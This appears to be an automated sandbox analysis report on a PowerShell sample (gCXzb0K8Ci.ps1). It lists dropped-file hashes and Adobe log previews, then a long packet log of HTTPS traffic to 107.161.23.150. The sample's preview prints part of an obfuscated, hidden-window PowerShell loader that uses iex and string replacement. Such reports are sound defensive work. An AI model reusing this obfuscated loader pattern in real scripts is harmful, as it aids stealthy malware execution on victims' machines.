                                                                                            SSDEEP:768:RNOpblrU6TBH44ADKZEg8VTEXDmWjHKnUboM9vjc1hnVPEYyu:6a6TZ44ADEHmQKnUEuvjcHnlEK
                                                                                            MD5:72C660CD8A79F93FA201971BC7CAF360
                                                                                            SHA1:C02E76DEF9433BDEFE7C62CAEBBD23D43B4DFA82
                                                                                            SHA-256:0EC597E0F671BD7189A3905479DEDAB8DA71DDD52617875F0A8ADC080AA51673
                                                                                            SHA-512:4BB061191085271B8535BC327F496E7B2A0BA29B2497FFE45380E22D5EF11C46517A57B797598026B922CB8BC6913CD1E1F149DD27B272B36C7A4F6C03FF48EC
                                                                                            Malicious:false
                                                                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlllul5zR/lL:NllU
                                                                                            MD5:A5504FD0F9BD6D8A85D83E1D0C86FBD1
                                                                                            SHA1:BE7D4EF288DE5F0C413C403ED471E51B574F4081
                                                                                            SHA-256:164D3BF457FA5CF68FE086795A945A8C54AA972FD8B8FA3C2A22EB5B741C1EB7
                                                                                            SHA-512:2D091AA5F1249D860C8FF969FFE7EEE8865C53A3B791E07BBD1E3CEA72355A3502D9E86A7F5055F21149A2ED01C6E77000B541D5432D10AC5F76BB2C017F4550
                                                                                            Malicious:false
                                                                                            Preview:@...e...................................t............@..........
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):3.5278731006694652
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAiOnH:Qw946cPbiOxDlbYnuRKj
                                                                                            MD5:D44B37C6449BDEA5D364C2AEBF7F4AAA
                                                                                            SHA1:A305B8C5BA1C73ABCCAFCC5E054EAB43583C4692
                                                                                            SHA-256:3AA90415246EED51C5CB8F92ED2D7AFC4C5DD5AF8339E82DCF38E921A64BC93E
                                                                                            SHA-512:44BEA676A603190A2065A67F9B85A621EC507581298C5D518E88C3BE09E9518C202028FC00F3AC19BC4D3446B774E27C2C699BF9824C1E75661A07ADD8EF4D01
                                                                                            Malicious:false
                                                                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.5.1.:.3.1. .=.=.=.....
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393)
                                                                                            Category:dropped
                                                                                            Size (bytes):16525
                                                                                            Entropy (8bit):5.376360055978702
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                            MD5:1336667A75083BF81E2632FABAA88B67
                                                                                            SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                            SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                            SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                            Malicious:false
                                                                                            Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):15112
                                                                                            Entropy (8bit):5.360168250450656
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:orKqupRpup+p1pQ/pZp4pwp0Wp9pbpJolo2vLeBeTeptOtutftWto5DMD8Dq6476:om1j8YHy/LGu6W79juxTA+aEkhAyAYOy
                                                                                            MD5:BE598FBFA18B99747CBFF7CC5FDA00DA
                                                                                            SHA1:2AEB5C49781679C318D7AF0852CA6BFBA7B92639
                                                                                            SHA-256:FA0F859DF175BBD045A31D4ECEED2768A58899BC361679E3984610643A377845
                                                                                            SHA-512:6393AF82296308011C3539BBD3005709F3287FEAD6496D93FA5D1AAEF799E5B517A1B488695D209EA55274396E3E609174EF8E2CB3B3D5D6F27BBFDC2E73C18E
                                                                                            Malicious:false
                                                                                            Preview:SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:932-0500 ThreadID=7468 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:933-0500 ThreadID=7468 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:934-0500 ThreadID=7468 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:934-0500 ThreadID=7468 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0ce9b234-8b98-421a-852c-6204b7d58950.1734609084932 Timestamp=2024-12-19T06:51:24:934-0500 ThreadID=7468 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29752
                                                                                            Entropy (8bit):5.403631967939493
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbY:E
                                                                                            MD5:6E0AE389E0FBB315C897326D1BF4D9EA
                                                                                            SHA1:E8D15A0B85CF79C6C74234159E776ED3A881A5F6
                                                                                            SHA-256:8656EE7215D02D5D1C7109CF6FDE01A93A0F28F16613D64A0612AF22A9E7D9A5
                                                                                            SHA-512:4BD134E1B2C9E17B9D2F13F413AD4EAD0D2D80BC7AAB7F48E7ED404FCD38BE289A82AC38AEB158B547A65C50ADA00CFB58DFDEA4E46692542B5A7C22ABA02918
                                                                                            Malicious:false
                                                                                            Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                            Category:dropped
                                                                                            Size (bytes):758601
                                                                                            Entropy (8bit):7.98639316555857
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                            MD5:3A49135134665364308390AC398006F1
                                                                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57837
                                                                                            Category:dropped
                                                                                            Size (bytes):1419751
                                                                                            Entropy (8bit):7.976496077007677
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xVwYIGNPoeWL07oYGZSdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07c:JVwZG7WLxYGZS3mlind9i4ufFXpAXkrj
                                                                                            MD5:22A99634354D0BAFF51C81188E41E3E6
                                                                                            SHA1:631D42D5283865133D98C6A9532210D220B485D2
                                                                                            SHA-256:0DFCFC14AA6415CE22ECA0D053B8F08C83FA08A0180C2C57EAE70D3B27D33E04
                                                                                            SHA-512:53F37C4971FE18775A7F7AFDA19FC052B31139AC67BDD24D631735F4D6E31BCB0B613B0D459598FA30FC98D27BD0709F1CCD32B07D5B381FE27401060CA753A1
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                                            Category:dropped
                                                                                            Size (bytes):1407294
                                                                                            Entropy (8bit):7.97605879016224
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xaWo7oSwYIGNPJlPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:JaW9SwZGJv3mlind9i4ufFXpAXkrfUsb
                                                                                            MD5:42FC8AEDABAE0F670104774CF07892C8
                                                                                            SHA1:DA92B8DFC846147F5E08B1CB0F2664A31B9D6D49
                                                                                            SHA-256:552985411551C39D1688991A2C5EBE9192B11CB0DB21269BDE0D699EE1F1EEE7
                                                                                            SHA-512:5BAA575657FE4E31CA800ECE12E105028391F1849ADF00AE0A4A718ECC762D36767EEFABC0C7664F9B677C92BF48DDC5F2FDBA4537C04D5AD82B93F21863AE50
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                            Category:dropped
                                                                                            Size (bytes):386528
                                                                                            Entropy (8bit):7.9736851559892425
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6222
                                                                                            Entropy (8bit):3.7046333041333366
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:OJOBsxCQbU2K+uplukvhkvklCywWn23+MjSOkQlzXSogZo1X+MjSOkQl/XSogZoH:RCxC1oDkvhkvCCtMW1bAHPW1bMHu
                                                                                            MD5:5AC2735075FEC58A1913C30844B3A91A
                                                                                            SHA1:69FDD89F9F430BF9E071DFF3B027B2986BD12467
                                                                                            SHA-256:DFA2D7F70099428B8C4684895EF736936AA0D56F8C57D2AC61BD227285854F55
                                                                                            SHA-512:E7AA3FF41096D9C4B6EE4B102077664A1A9BD61004A03727DED58F36FF5C8D7604356D556CA26CF287D682CFFAB9865FCA99D6656680300CD1B136AAFF478312
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ...d......[".J.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M........F.R.....J.R......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y\^....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Yb^..Roaming.@......DWSl.Yb^....C.....................G.(.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y\^....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y\^....E......................'.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y\^....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y\^....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Ye^....q...........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PDF document, version 1.7 (zip deflate encoded)
Category: dropped
Size (bytes): 871324
Entropy (8bit): 7.827941732382635
Encrypted: false
SSDEEP: 24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
MD5: CC648C9FBCD03EAC939663F24ED3AB02
SHA1: 56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
SHA-256: F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
SHA-512: 5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: JSON data
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

File type: ASCII text, with very long lines (841), with no line terminators
Entropy (8bit): 5.343717723196597
TrID:
File name: gCXzb0K8Ci.ps1
File size: 841 bytes
MD5: f66c1baa8805a9f3d84f0d7b253b62b0
SHA1: 482e3694cd0de951055dc9c58af3c351fb8a5a78
SHA256: d4e49fb44f2d9c6b2626e82bfbded73e771f55e506618c5a2b47afbcf218bc24
SHA512: c00e98e04fece2afa819794a30ae0dbcbae8ee6796c9657916d323feaa438e7e084125214828e9144fb884501c5274370529ad136f8b4915f1592a0755126bda
SSDEEP: 24:Xbh7GsAPNjWIfnLBgQWAa6KzswLv36pzo2G:xwKIllKzswjcoj
TLSH: 9001128727D356F36501F01960CC9A3E36799E4664D914B3B6F98E1710ECA3D0DC1936
File Content Preview: powershell -win hidden $m3jbla=iex($('[Environment]::GetEvh2s'''.Replace('vh2','nvironmentVariable(''public'') + ''\\j5mh76.vb')));$flol=iex($('[Environment]::GetEvh2s'''.Replace('vh2','nvironmentVariable(''public'') + ''\\v49.vb')));function getit([strin
Icon Hash: 3270d6baae77db44
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 19, 2024 12:51:18.814944029 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:18.814995050 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:18.815088987 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:18.826721907 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:18.826734066 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.079413891 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.079495907 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.083570004 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.083587885 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.083848000 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.094868898 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.135333061 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.525202990 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.572397947 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.644756079 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.644766092 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.644819021 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.644840956 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.644855022 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.644948006 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.644978046 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.645142078 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.758049965 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.758073092 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.758187056 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.758208990 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.758249998 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.798417091 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.798444033 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.798522949 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.798535109 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.798574924 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.929415941 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.929439068 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.929575920 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.929593086 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.929634094 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.957405090 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.957422018 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.957655907 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.957665920 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.957711935 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.981509924 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.981540918 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.981614113 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:20.981620073 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:20.981668949 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.108844995 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.108867884 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.108988047 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.109003067 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.109040976 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.126651049 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.126674891 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.126921892 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.126935959 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.126975060 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.146833897 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.146867037 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.146956921 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.146969080 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.147012949 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.147037983 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.166378021 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.166394949 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.166623116 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.166650057 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.166709900 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.183621883 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.183639050 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.183748007 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.183768034 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.183809996 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.203679085 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.203722000 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.203772068 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.203780890 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.203804970 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.203818083 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.306407928 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.306417942 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.306591988 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.306607962 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.306664944 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.321078062 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.321096897 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.321196079 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.321206093 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.321244001 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.334949017 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.334966898 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.335064888 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.335072041 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.335104942 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.346784115 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.346800089 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.346879005 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.346887112 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.346924067 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.359597921 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.359615088 CET  443          49704      107.161.23.150  192.168.2.5
Dec 19, 2024 12:51:21.359699965 CET  49704        443        192.168.2.5     107.161.23.150
Dec 19, 2024 12:51:21.359709024 CET  443          49704      107.161.23.150  192.168.2.5
